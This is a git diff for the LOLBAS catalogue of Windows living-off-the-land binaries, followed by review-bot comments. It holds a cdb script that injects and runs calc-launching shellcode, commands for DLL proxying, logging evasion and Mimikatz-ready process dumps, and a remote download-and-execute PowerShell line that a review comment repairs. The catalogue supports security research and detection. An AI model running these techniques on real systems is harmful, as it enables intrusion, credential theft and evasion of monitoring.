@$t0+2B 31 +;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0 +;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C +;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41 +;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41 +;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED +;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48 +;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B +;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01 +;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88 +;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48 +;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67 +;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50 +;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb 
@$t0+5F 44 +;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49 +;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56 +;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41 +;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48 +;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31 +;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0 +;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9 +;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1 +;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1 +;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24 +;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1 +;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44 +;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49 +;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41 +;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44 +;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49 +;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B +;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01 +;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41 +;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A +;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59 +;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83 +;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52 +;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41 +;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B +;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF +;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48 +;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00 +;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00 +;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D +;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00 +;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B +;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5 +;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A +;eb @$t0+E8 
0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6 +;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF +;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4 +;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C +;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0 +;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47 +;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A +;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89 +;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63 +;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00 + +$$ Redirect execution to the shellcode buffer +r @$ip=@$t0 + +$$ Continue program execution - i.e. execute the shellcode +g + +$$ Continue program execution after hitting a breakpoint +$$ upon starting calc.exe. This is specific to this shellcode. +g + +$$ quit cdb.exe +q \ No newline at end of file diff --git a/OtherMSBinaries/Rcsi.yml b/OtherMSBinaries/Rcsi.yml new file mode 100644 index 0000000..6f0b2b1 --- /dev/null +++ b/OtherMSBinaries/Rcsi.yml @@ -0,0 +1,15 @@ +--- +Name: rcsi.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rcsi.exe bypass.csx + Description: Use embedded C# within the csx script to execute the code. +Full Path: '' +Code Sample: [] +Detection: [] +Resources: + - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ +Notes: Thanks to Matt Nelson - @enigma0x3 diff --git a/OtherMSBinaries/Sqldumper.yml b/OtherMSBinaries/Sqldumper.yml new file mode 100644 index 0000000..c3ec084 --- /dev/null +++ b/OtherMSBinaries/Sqldumper.yml 
@@ -0,0 +1,21 @@ +--- +Name: Sqldumper.exe +Description: Dump process +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: sqldumper.exe 464 0 0x0110 + Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). + - Command: sqldumper.exe 540 0 0x01100:40 + Description: 0x01100:40 flag will create a Mimikatz compatibile dump file. +Full Path: + - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe + - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/countuponsec/status/910969424215232518 + - https://twitter.com/countuponsec/status/910977826853068800 + - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se +Notes: Thanks to Luis Rocha - @countuponsec diff --git a/OtherMSBinaries/Sqlps.yml b/OtherMSBinaries/Sqlps.yml new file mode 100644 index 0000000..3fd5a0b --- /dev/null +++ b/OtherMSBinaries/Sqlps.yml @@ -0,0 +1,16 @@ +--- +Name: Sqlps.exe +Description: Execute, evade logging +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Sqlps.exe -noprofile + Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging. +Full Path: + - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/bryon_/status/975835709587075072 +Notes: Thanks to Bryon - @bryon_ diff --git a/OtherMSBinaries/Sqltoolsps.yml b/OtherMSBinaries/Sqltoolsps.yml new file mode 100644 index 0000000..541dc2d --- /dev/null +++ b/OtherMSBinaries/Sqltoolsps.yml 
@@ -0,0 +1,16 @@ +--- +Name: SQLToolsPS.exe +Description: Execute, evade logging +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe + Description: Run PowerShell scripts and commands. +Full Path: + - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/993298228840992768 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherMSBinaries/Te.yml b/OtherMSBinaries/Te.yml new file mode 100644 index 0000000..d361af8 --- /dev/null +++ b/OtherMSBinaries/Te.yml @@ -0,0 +1,15 @@ +--- +Name: te.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: te.exe bypass.wsc + Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. +Full Path: '' +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg +Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s diff --git a/OtherMSBinaries/Tracker.yml b/OtherMSBinaries/Tracker.yml new file mode 100644 index 0000000..2bedbd7 --- /dev/null +++ b/OtherMSBinaries/Tracker.yml @@ -0,0 +1,17 @@ +--- +Name: Tracker.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe + Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. +Full Path: '' +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/subTee/status/793151392185589760 + - https://attack.mitre.org/wiki/Execution + +Notes: Thanks to Casey Smith - @subTee diff --git a/OtherMSBinaries/Vsjitdebugger.yml b/OtherMSBinaries/Vsjitdebugger.yml new file mode 100644 index 0000000..b2836fa --- /dev/null 
+++ b/OtherMSBinaries/Vsjitdebugger.yml @@ -0,0 +1,16 @@ +--- +Name: vsjitdebugger.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Vsjitdebugger.exe calc.exe + Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. +Full Path: + - c:\windows\system32\vsjitdebugger.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/990758590020452353 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OtherMSBinaries/Winword.yml b/OtherMSBinaries/Winword.yml new file mode 100644 index 0000000..d877c2a --- /dev/null +++ b/OtherMSBinaries/Winword.yml @@ -0,0 +1,17 @@ +--- +Name: winword.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: winword.exe /l dllfile.dll + Description: Launch DLL payload. +Full Path: + - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/vysecurity/status/884755482707210241 + - https://twitter.com/Hexacorn/status/885258886428725250 +Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals) diff --git a/OtherScripts/Testxlst.yml b/OtherScripts/Testxlst.yml new file mode 100644 index 0000000..2f763d7 --- /dev/null +++ b/OtherScripts/Testxlst.yml 
@@ -0,0 +1,18 @@ +--- +Name: testxlst.js +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out + Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). + - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out + Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). +Full Path: + - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation) +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/bohops/status/993314069116485632 +Notes: Thanks to Jimmy - @bohops diff --git a/README.md b/README.md index 5612430..3d0a136 100644 --- a/README.md +++ b/README.md 
@@ -1 +1,81 @@ -# LOLBAS \ No newline at end of file +# Living Off The Land Binaries and Scripts (and now also Libraries) + + + + +There are currently three different lists. + +* [LOLBins](LOLBins.md) +* [LOLLibs](LOLLibs.md) +* [LOLScripts](LOLScripts.md) + + +The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques. + +Definition of LOLBAS candidates (Binaries,scripts and libraries): +* LOLBAS candidates must be present on the system by default or introduced by application/software "installation" from a "reputable" vendor or open-source entity. Otherwise, LOLBAS determination is subject to scrutiny by the (security) community and agreed upon standards. +* Can be used as an attacker tool directly or can perform other actions than what it was intended to do (Ex: regsvr32 - execute code from SCT online) + * executing code + * downloading/upload files + * bypass UAC + * compile code + * getting creds/dumping process + * surveillance (keylogger, network trace) + * evade logging/remove log entry + * side-loading/hijacking of DLL + * pass-through execution of other programs, script (via a LOLBin) + * pass-through persistence utilizing existing LOLBin + * persistence (Hide data in ADS, execute at logon etc) + +Right now it is me that decides if the files are a valid contribution or not. +I try my best to conclude with help from others in the InfoSec community and I do not wish to exclude anything. +Also, please be patient if it takes some time for your contribution to be added to the list. I am just one guy. + +Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. +I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee) +Would really love if the community could contribute as much as possible. That would make it better for everyone. 
+If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you. + + +## STORY +"Living off the land" was coined by Matt Graeber - @mattifestation <3 +One of the first "Living Off The Land" talks (That I know of) is this one: +https://www.youtube.com/watch?v=j-r6UonEkUw + +The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here: +https://twitter.com/MathCasualty/status/969174982579273728 + +The term LOLScripts came from Jimmy - @bohops: +https://twitter.com/bohops/status/984828803120881665 + +Common hashtags for these files are: + +#LOLBin +#LOLBins +#LOLScript +#LOLScripts +#LOLLib +#LOLLibs + +A "highly scientific poll" was also conducted to agree (69% yes) on the name LOLBins. +https://twitter.com/Oddvarmoe/status/985432848961343488 + +The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you) + +The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! + +Love this logo: + + +## Future work / Todo list +- [ ] Better classification system + - [ ] Load DLL + - [ ] Arbitrary unsigned code execution + - [ ] Launch other process +- [ ] Better contribution template +- [ ] Provide the project in DB format (sqlite) +- [ ] Re-factor project (version 2.0) and move it to a dedicated project site (https://github.com/LOLBAS-Project) +- [ ] Map it to the Mitre Att&ck <3 +- [ ] LOLGuiBins +- [ ] More list based on classifications +- [ ] LOLBAS lists for Linux? OSX?
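Review bot: Detection is left as `[]` in Pubprn.yml although the Command already gives the observable: `pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct` means a cscript.exe/wscript.exe process whose command line names pubprn.vbs and a `script:` moniker pointing at a URL, which is cheap to state as a detection hint. The same empty Detection field recurs in every .yml added by this commit; where the Command itself is the indicator, one sentence per entry would make the new format more useful than the .md pages it mirrors.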
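Review bot: the Slmgr.yml Description, 'Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code', does not say which half of `reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs` does what; say that the registry import installs the hijack and that slmgr.vbs is only the trigger that instantiates the object, so a reader knows the reg file (linked under Code Sample) is the part to inspect and the registry write is the part to detect.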
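Review bot: the PowerShell in the Syncappvpublishingserver.yml Command has unbalanced parentheses. `"n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"` opens three and closes two, so the injected code will not parse. Drop the extra leading paren: `"n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"`.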
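Review bot: the third Command in Winrm.yml joins two commands with a literal `\n` inside a plain YAML scalar; a YAML parser keeps those as the two characters backslash and n, not a newline, so the rendered value is `... -r:http://acmedc:5985 \nwinrm invoke StartService ...`. Split it into two Command entries, or double-quote the scalar so `\n` is an escape. The placeholder host also differs between the two WMI examples (`http://target:5985` versus `http://acmedc:5985`); one placeholder would read better. Finally, the first Command and the Code Sample reuse `Slmgr.reg` from Slmgr.yml; say in the Description that the same Scripting.Dictionary hijack file is the trigger here and `winrm quickconfig` only instantiates it, otherwise the Slmgr reference reads as a copy-paste leftover.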
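Review bot: the pester.yml Description says 'The third parameter can be anything. The fourth is the payload', but the example `Pester.bat [/help|?|-?|/?] "$null; notepad"` passes only two arguments, so the reader cannot map those positions onto it; restate it in terms of the example (first argument any of the listed help switches, second argument the payload) or show all four. The Full Path list gives both `...\Pester\3.4.0\bin\Pester.bat` and `...\Pester\*\bin\Pester.bat`; the wildcard form already covers the versioned one. The Resources entry also links back to this repository's own `OSScripts/pester.md`; if the .yml files added here are meant to replace the .md pages, that link will dangle.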
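Review bot: in AcroRd32.yml the Command field holds an instruction ('Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary') rather than a command line, and Full Path is a directory rather than the path of AcroRd32.exe. It is also worth a sentence in Notes that this is a file replacement under Program Files (x86), so it presupposes write access to that directory; that is a different prerequisite from the argument-driven entries elsewhere in the list, and the same applies to the ROCCAT_Swarm.yml entry ('Replace ROCCAT_Swarm_Monitor.exe with your binary.exe').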
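Review bot: the Full Path entry in Gpup.yml has a trailing space inside the quotes, `'C:\Program Files (x86)\Notepad++\updater\gpup.exe '`, which will carry into anything that compares or resolves the path; remove it, after which the quoting is no longer needed.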
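Review bot: Nlnotes.yml is named for NLNOTES.EXE and its Command invokes `NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command ...`, but its Full Path is `C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe`, the same binary that Notes.yml documents with the same resources. Either give the nlnotes.exe path or, if the two entries describe one launcher, merge them. Also `(Get-ExecutionPolicy )` has a stray space before the closing paren that the Notes.yml copy does not have.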
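Review bot: in Nvudisp.yml, 'Copy fila A to file B' should read 'Copy file A to file B'; the CreateShortcut example has a stray backslash before the closing quote in `"c:\windows\system32\calc.exe\"`, which the otherwise identical example in Nvuhda6.yml does not; and `Nvudisp.exe Run foo` carries a Description of `?`, so either document what Run does or leave the row out until it is known. The KillApp example names `calculator.exe` while the System example launches `calc.exe`; pick one process name so the two rows read as a pair.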
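Review bot: Nvuhda6.yml repeats the 'fila' typo and the `Run foo` / `?` row from Nvudisp.yml, and its Full Path is `?`. An entry without a location is hard to act on for either attacker or defender; if the hexacorn post in Resources does not give one, use 'No fixed path' as Bginfo.yml does so the field is at least consistent with the rest of the commit.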
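Review bot: 'Setup.exe' in Setup.yml is too generic a Name for a list keyed by binary name, and Full Path `C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315` is an extracted package directory rather than an install location. Since the Description says the technique is hijacking hpbcsiServiceMarshaller.exe, consider naming the entry after that binary or the HP package so it is findable, and give the Command as an actual command line rather than 'Run Setup.exe'.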
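Review bot: 'persistance' in the VBoxDrvInst.yml Description should be 'persistence', and Full Path `C:\Program Files\Oracle\VirtualBox Guest Additions` should end with `\VBoxDrvInst.exe` like the other entries that give a full path rather than a directory.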
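Review bot: the second and third Commands in Appvlp.yml carry the identical Description 'Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command', which hides the difference between them: the third one calls `$e.RegisterXLL('\\webdav\xll_poc.xll')` to have Excel load an XLL from a WebDAV share. Say that in its Description, and 'run' should be 'runs' in both.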
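Review bot: the third Command's Description in Bginfo.yml, 'This style of execution may not longer work due to patch', is a status remark ('no longer', not 'not longer') rather than a description of what the command does. Describe the command (bginfo.exe loaded from `\\live.sysinternals.com\Tools` with a .bgi fetched from WebDAV) and move the patch caveat into Notes, ideally naming the update if the linked post does.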
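Review bot: Cdb.yml has `Code Sample: []` even though this commit adds `OtherMSBinaries/Payload/Cdb_calc.wds`; link it the way Pubprn.yml and Slmgr.yml link their payloads. The Command `cdb.exe -cf x64_calc.wds -o notepad.exe` also names the file x64_calc.wds, so either rename the payload or change the command to `cdb.exe -cf Cdb_calc.wds -o notepad.exe` so the two agree.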
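Review bot: `csi.exe file` in Csi.yml does not show what 'file' is; the Description says it runs unsigned C# code, so name a script argument, for example `csi.exe payload.csx`, and say the extension in the Description. The second Resources link is the dnx.exe write-up that Dnx.yml already cites; keep it here only if it also covers csi.exe.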
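Review bot: the second Command in Mftrace.yml is `Mftrace.exe powershell.exe` but its Description still says 'Launch cmd.exe as a subprocess of Mftrace.exe', copied from the first row; it should read 'Launch powershell.exe as a subprocess of Mftrace.exe'. The only Resources entry is marked '(Currently not accessible)'; an archived copy or a second source would keep the entry verifiable.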
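Review bot: the second Command in Msxsl.yml is misspelled `msxls.exe`; it should be `msxsl.exe` as in the first Command and the Name field. That command also passes the same shellcode.xml URL as both the XML input and the stylesheet; say in the Description that one remote file serves as both arguments, since that is what a reader will otherwise assume is a copy-paste mistake.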
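Review bot: the header of Payload/Cdb_calc.wds says 'Save this to a file - e.g. x64_calc.wds' and gives the run line `cdb.exe -cf x64_calc.wds -o notepad.exe`, but the file is committed as Cdb_calc.wds; update the comment to the committed name (or rename the file) so the two match. The file also ends without a trailing newline ('\ No newline at end of file'), leaving the final `q` command on an unterminated line; add one. The sizing itself checks out: `.dvalloc 272` matches the 0x110 bytes written by the `eb` lines (offsets 00 through 10F).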
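Review bot: Full Path in Rcsi.yml is the empty string `''`, while other entries in this commit use `- N/A` (Csi.yml, Dnx.yml, Msxsl.yml), `- No fixed path` (Bginfo.yml) or `- ?` (Nvuhda6.yml) for the same situation; pick one sentinel for 'no fixed location' across the .yml files, otherwise the sqlite export and classification work listed in the README todo will have to special-case each. Te.yml and Tracker.yml have the same `''`.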
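Review bot: 'compatibile' in the second Sqldumper.yml Description should be 'compatible', and 464 and 540 are example PIDs that should be marked as placeholders (for example `<PID>`) so nobody copies them literally. The two flag values `0x0110` and `0x01100:40` differ in digit count; if both are intended, a word on what each selects would stop readers from treating one as a typo for the other.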
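Review bot: the Full Path in Sqlps.yml, `C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe`, is missing the closing parenthesis after `(x86`; it should be `C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe`.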
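Review bot: Sqltoolsps.yml is named for SQLToolsPS.exe and its Command runs `SQLToolsPS.exe -noprofile -command Start-Process calc.exe`, but Full Path ends in `sqlps.exe` (`C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe`), which is the Sqlps.yml binary; the filename should be SQLToolsPS.exe. The entry-level Description claims 'Execute, evade logging' but the command Description ('Run PowerShell scripts and commands') does not say what logging is evaded; Sqlps.yml spells it out (Module and ScriptBlock Logging), and this entry should do the same or drop the claim.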
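Review bot: `https://attack.mitre.org/wiki/Execution` in the Tracker.yml Resources is the generic Execution tactic page rather than a reference for tracker.exe; cite the specific technique or drop it, since the README todo already plans a proper ATT&CK mapping. There is also a stray blank `+` line between Resources and Notes, and Full Path is `''`; if the linked tweet gives the install location, add it.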
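Review bot: Notes in Winword.yml has a doubled at-sign, `@@vysecurity`; it should be `@vysecurity`. The Description for `winword.exe /l dllfile.dll`, 'Launch DLL payload', could say that the DLL is loaded into the WINWORD.EXE process via the /l add-in switch, which is the detail a detection needs.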
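Review bot: Testxlst.yml spells the script `testxlst.js` in Name and both Commands but `testxslt.js` in Full Path; one of them is wrong and the entry is unfindable under the other spelling, so settle it against the file on disk (the Description says it performs an XSL transform, which points to the testxslt spelling). Both Commands pass `c:\test\test.xls` as the stylesheet argument, which looks like it should be `test.xsl`. '(Visual Studio Installation)' in the Full Path line belongs in Notes so the path field is only a path.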
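Review bot: a few grammar fixes for README.md: 'The goal of these lists are to document' should be 'is to document'; 'has it's own .md file' should be 'its own'; 'That way I should be easier to maintain' should be 'That way it should be easier'; 'The awesome logos ... was provided' should be 'were provided'; 'registered by an unknown individual and redirected it to this project' should be 'who redirected it'. The three empty lines after the title and the line 'Love this logo:' with nothing after it look like image references that did not make it into the commit; add the logo paths or drop the lines. Finally, 'Every binary, script and library has it's own .md file' does not mention the per-entry .yml files this commit adds; say whether they replace or sit alongside the .md pages.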